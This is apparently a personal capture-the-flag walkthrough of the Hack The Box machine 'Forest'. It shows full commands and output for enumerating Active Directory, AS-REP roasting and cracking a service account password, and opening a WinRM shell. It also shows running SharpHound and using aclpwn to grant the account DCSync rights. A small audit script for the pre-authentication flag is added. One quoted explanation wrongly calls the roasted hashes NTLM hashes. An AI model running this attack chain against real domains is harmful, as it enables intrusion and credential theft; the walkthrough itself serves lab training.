Forest

This is a Windows machine from Hack The Box.

Nmap scan
└─$ nmap -sV -sC -oA active 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 06:08 EDT
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-06 10:15:54Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  0ċ�V       Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-06T10:16:17
|_  start_date: 2023-09-06T10:13:19
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m31s, median: 6m50s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-09-06T03:16:16-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds

Trying port 445 (SMB) first as potential low-hanging fruit

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb  10.10.10.161  -u "" -p ""
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

Domain is htb.local

Enumerating shares – Getting nothing much


┌──(kali㉿kali)-[~/HTB/Forest]
└─$ crackmapexec smb 10.10.10.161 --shares   
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 358, in connectTree
    return self._SMBConnection.connect_tree(share)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb.py", line 2835, in tree_connect_andx

Using ldapsearch to try and get usernames. The command has the form "ldapsearch -x -H ldap://10.10.10.161 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub '(objectClass=person)' sAMAccountName", with the base DN replaced by this domain's naming context, which we query first.


┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ldapsearch -x -H ldap://10.10.10.161 -s base namingcontexts   

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Then using the command to get the users, and we grep only the usernames: ldapsearch -x -H ldap://10.10.10.161 -b 'DC=htb,DC=LOCAL' -s sub '(objectClass=person)' sAMAccountName

Guest
DefaultAccount
FOREST$
EXCH01$
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
andy
mark
santi
                                                                                                                                                                                                                                                 


Using kerbrute to find which users are valid, after saving the usernames to users.txt

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ./kerbrute userenum --dc 10.10.10.161 -d  HTB.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/06/23 - Ronnie Flathers @ropnop

2023/09/06 06:28:11 >  Using KDC(s):
2023/09/06 06:28:11 >   10.10.10.161:88

2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  Done! Tested 6 usernames (6 valid) in 0.346 seconds
                                                                                                                                                                                                                                                 
Adding htb.local to the hosts file

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.190.10.161   htb.local

Using GetNPUsers.py from Impacket, for example:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra

Password:

^CTraceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 470, in <module>
    executer.run()
  File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 257, in run
    ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 115, in __init__
    self._socket.connect(sa)
KeyboardInterrupt


Not able to get any hashes for the users


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/Lucinda 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate Lucinda, getting its TGT
[-] User Lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/santi  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate santi, getting its TGT
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/mark 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate mark, getting its TGT
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/andy         
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate andy, getting its TGT
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/sebastien
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate sebastien, getting its TGT
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set

Using the command GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'

From ChatGPT –> Effectively, the command is attempting to retrieve NTLM hashes for user accounts in the ‘htb.local’ domain from the domain controller at IP 10.10.10.161 that have the “Do not require Kerberos pre-authentication” setting enabled.


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-09-06 07:04:05.238787  2019-09-23 07:09:47.931194  0x410200 



[email protected]:1fc8155b51cbc86433259e43c839f3b6$debc0747dcb68f4f0b7780f062d7b876a40957451858e76dded149772ee51dbebf968c991765873fc8bcb04d92ea7f5ea9f43c1ab5ca60f11befbf0d2fa4b5e6e6428cc58911fed2c99f9d690cb5cd36c9b3e83b75843f201d97ee0064749b4631e07807cc9ef420a255ada51413c0a95749aab4ee0f080045291085edd2d1849dc72baf68cb7048855b0820de16db49b7544699463273c81c8480cbf79b8c13006b897a20599b5a897975e2bcc0d4fabae512bbba6061e95735b2dd64320bbb798f515a2f240b072fe70020622b79a6d86deabc0c0186dbe79445d121802d14e36b23029594
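
The UAC column in the table above is a bit field: 0x410200 for svc-alfresco includes DONT_REQ_PREAUTH, the bit that lets anyone request an AS-REP for the account, encrypted with a key derived from its password, without first proving knowledge of that password. The following is an added example, not part of the original notes or of Impacket: it decodes that value and audits an LDIF export for enabled accounts with the bit set. The sample LDIF, including the user-a and old-svc accounts, is constructed.

```python
# Added example: audit userAccountControl values for DONT_REQ_PREAUTH.
# Flag values are the documented userAccountControl bits; the sample data is constructed.

UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000010: "LOCKOUT",
    0x00000020: "PASSWD_NOTREQD",
    0x00000200: "NORMAL_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00100000: "NOT_DELEGATED",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQ_PREAUTH",
    0x00800000: "PASSWORD_EXPIRED",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x00000002
DONT_REQ_PREAUTH = 0x00400000

# Server-side equivalent: LDAP bitwise-AND matching rule on the same bit (4194304 == 0x400000).
PREAUTH_FILTER = "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# Constructed sample shaped like ldapsearch output. Only the svc-alfresco DN and
# its UAC value (0x410200 == 4260352) come from the page.
SAMPLE_LDIF = """\
# constructed sample
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=user-a,CN=Users,DC=htb,DC=local
sAMAccountName: user-a
userAccountControl: 512

dn: CN=old-svc,CN=Users,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""


def decode_uac(value):
    """Return the names of the set bits, lowest bit first (unknown bits as hex)."""
    names = []
    bit = 1
    while bit <= value:
        if value & bit:
            names.append(UAC_FLAGS.get(bit, hex(bit)))
        bit <<= 1
    return names


def parse_ldif(text):
    """Parse simple 'attr: value' LDIF (single-valued, no folded or base64 lines)."""
    entries, current = [], {}
    for line in text.splitlines():
        line = line.rstrip()
        if not line:
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#") or ": " not in line:
            continue
        key, value = line.split(": ", 1)
        current[key.lower()] = value
    if current:
        entries.append(current)
    return entries


def audit_preauth(entries):
    """Return (account, flags) for enabled accounts that skip Kerberos pre-authentication."""
    findings = []
    for entry in entries:
        if "useraccountcontrol" not in entry:
            continue
        uac = int(entry["useraccountcontrol"], 0)
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            findings.append((entry.get("samaccountname", "?"), decode_uac(uac)))
    return findings


if __name__ == "__main__":
    for name, flags in audit_preauth(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: pre-authentication not required ({', '.join(flags)})")
```

Any account this reports should have the flag cleared unless an application genuinely needs it, and in that case a long random password.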
                                                                                                                                                                                 

Check the hash mode

./hashcat --example-hashes | less 

Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX



Cracking the hash with hashcat gives the password s3rvice


[email protected]:7d0b8ffb982981828a17da5d8eee9ec3$25f69765117a64010ad204b7d80d9a6ccbbc3144012f87316b517b126518efe6e0fbb1c3ea1a19ad630c4e61e2a80a6257048f2c8446b4e81fccf6da76d049c1b221924b2904800ed0c695180312ae92870831140785547ab76fca82564e101c0c67e7893d1890ae65cd394cf048e711ddd5546fefee809c15241044dc9ce08c49ccbaf7db218b7927f0bca416c202b356dcd554bb03c1cbfeba4848c3dec11575c4a328c8610d893b95334e23a1ac527d53ff806b96e424dab29e557a7fe5077eb3c32bdd50135b0256f988c5c992bf8c45114d0b9660a528f6400059ae5dafcf072dfc98f4:s3rvice
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:7d0b8ffb982981...fc98f4
Time.Started.....: Wed Sep  6 07:08:52 2023 (7 secs)
Time.Estimated...: Wed Sep  6 07:08:59 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   584.0 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s523480 -> s3r3ndipit
Hardware.Mon.#1..: Util: 71%

Started: Wed Sep  6 07:08:49 2023
Stopped: Wed Sep  6 07:09:01 2023

Using crackmapexec to check if we can pwn the host over WinRM


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

Using evil-winrm we get the user flag – 9b467960b7b0ddd353dd7a2ad776a254

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
9b467960b7b0ddd353dd7a2ad776a254
*Evil-WinRM* PS C:\Users\svc-alfre

Upload SharpHound, run it from the folder it was uploaded to, then download the resulting zip file


Info: Uploading /home/kali/HTB/Forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
                                                  
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/6/2023   4:26 AM        1046528 SharpHound.exe
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> SharpHound.exe
The term 'SharpHound.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ SharpHound.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (SharpHound.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
2023-09-06T04:28:17.2104460-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-09-06T04:28:17.6479741-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:17.7416956-07:00|INFORMATION|Initializing SharpHound at 4:28 AM on 9/6/2023
2023-09-06T04:28:18.5698497-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-09-06T04:28:18.7885786-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:19.8667072-07:00|INFORMATION|Beginning LDAP search for htb.local
2023-09-06T04:28:20.0073312-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-06T04:28:20.0073312-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-06T04:28:49.8983385-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-09-06T04:29:03.4449219-07:00|INFORMATION|Consumers finished, closing output channel
2023-09-06T04:29:03.4917929-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Enumeration finished in 00:00:43.9036240
2023-09-06T04:29:03.8369185-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 117 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-09-06T04:29:03.8519606-07:00|INFORMATION|SharpHound Enumeration Completed at 4:29 AM on 9/6/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/6/2023   4:29 AM          18650 20230906042902_BloodHound.zip
-a----         9/6/2023   4:29 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/6/2023   4:26 AM        1046528 SharpHound.exe
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20230906042902_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Desktop\20230906042902_BloodHound.zip to 20230906042902_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

Using bloodhound

Start Neo4j


                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo neo4j console   
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-09-06 11:25:48.852+0000 INFO  Starting...
2023-09-06 11:25:51.070+0000 INFO  This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)

Go to http://localhost:7474/ and change the password

Start BloodHound using the bloodhound command and log in

Go to Analysis –> shortest path to domain admin


Found a very cool utility on GitHub that works with BloodHound automatically –> github.com/fox-it/


pip install aclpwn
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo pip install aclpwn
[sudo] password for kali: 
Collecting aclpwn
  Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.11.0)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.9.1)
Collecting neo4j-driver (from aclpwn)
  Downloading neo4j-driver-5.12.0.tar.gz (191 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 191.1/191.1 kB 1.5 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.31.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->aclpwn) (1.2.4)
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2023.3)
Building wheels for collected packages: neo4j-driver
  Building wheel for neo4j-driver (pyproject.toml) ... done
  Created wheel for neo4j-driver: filename=neo4j_driver-5.12.0-py3-none-any.whl size=263951 sha256=d520dd450afa34d41f327d68a05f95d96a4e6a57307dd65b309d5bdc48a501ee
  Stored in directory: /root/.cache/pip/wheels/a4/f7/ba/ecf94a7eb4eb6631820c99bb894dcc90477101cb90e6d46237
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
Successfully installed aclpwn-1.0.0 neo4j-driver-5.12.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv

Running aclpwn on our machine after starting BloodHound: aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice

aclpwn -f svc-alfresco.local -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -a 10.10.10.161 -sp s3rvice
Traceback (most recent call last):
  File "/usr/local/bin/aclpwn", line 5, in <module>
    from aclpwn import main
  File "/usr/local/lib/python3.11/dist-packages/aclpwn/__init__.py", line 7, in <module>
    from aclpwn import utils, pathfinding, database, exploitation
  File "/usr/local/lib/python3.11/dist-packages/aclpwn/pathfinding.py", line 1, in <module>
    from aclpwn import utils, database
  File "/usr/local/lib/python3.11/dist-packages/aclpwn/database.py", line 2, in <module>
    from neo4j.v1 import GraphDatabase
ModuleNotFoundError: No module named 'neo4j.v1'

This error occurs because the neo4j Python driver that pip installed is version 5 (neo4j-driver 5.12.0 above), while aclpwn expects the version 1 API (the neo4j.v1 module)

Will run this in a virtual environment

sudo apt install python3.11-venv

python3 -m venv myenv

pip install aclpwn neo4j==1.*


We then run the same command in this environment and still get the same error

Found a fix via ChatGPT

  • Locate the database.py file for aclpwn. Based on your error, it’s located at /usr/local/lib/python3.11/dist-packages/aclpwn/database.py
  • Changed "from neo4j.v1 import GraphDatabase" to "from neo4j import GraphDatabase"

After spending many hours with different versions of BloodHound and neo4j, I finally got aclpwn to work

To install aclpwn

pip install aclpwn

Running BloodHound 3.0.5

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls                            
BloodHound              chrome_200_percent.pak  icudtl.dat  libffmpeg.so  libvk_swiftshader.so  LICENSE                 locales    resources.pak      swiftshader              version
chrome_100_percent.pak  chrome-sandbox          libEGL.so   libGLESv2.so  libvulkan.so          LICENSES.chromium.html  resources  snapshot_blob.bin  v8_context_snapshot.bin  vk_swiftshader_icd.json
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound  
(node:12127) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.



Starting neo4j

┌──(kali㉿kali)-[~]
└─$ sudo neo4j console                                             
[sudo] password for kali: 
Active database: graph.db
Directories in use:
  home:         /var/lib/neo4j
  config:       /etc/neo4j
  logs:         /var/log/neo4j
  plugins:      /var/lib/neo4j/plugins
  import:       /var/lib/neo4j/import
  data:         /var/lib/neo4j/data
  certificates: /var/lib/neo4j/certificates
  run:          /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-09 12:33:43.663+0000 INFO  ======== Neo4j 3.5.35 ========
2023-09-09 12:33:43.713+0000 INFO  Starting...
2023-09-09 12:33:49.736+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2023-09-09 12:33:53.386+0000 INFO  Started.
2023-09-09 12:33:55.678+0000 INFO  Remote interface available at http://localhost:7474/
2023-09-09 12:35:20.565+0000 WARN  The client is unauthorized due to authentication failure.

The SharpHound file we used is inside the source archive for BloodHound 3.0.5

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml            deploy.sh  index.html  LICENSE-3RD-PARTY.md  main.js       package-lock.json  renderer.js  src                            webpack.config.production.js
BloodHoundExampleDB.db  docs       Ingestors   LICENSE.md            package.json  README.md          server.js    webpack.config.development.js
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors       
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds  SharpHound.exe  SharpHound.ps1
                                                                                                                                                                                                                                             
Running aclpwn

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Base,Domain)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 0
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE TRUSTED [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Memberof -> continue
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-084819.restore
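
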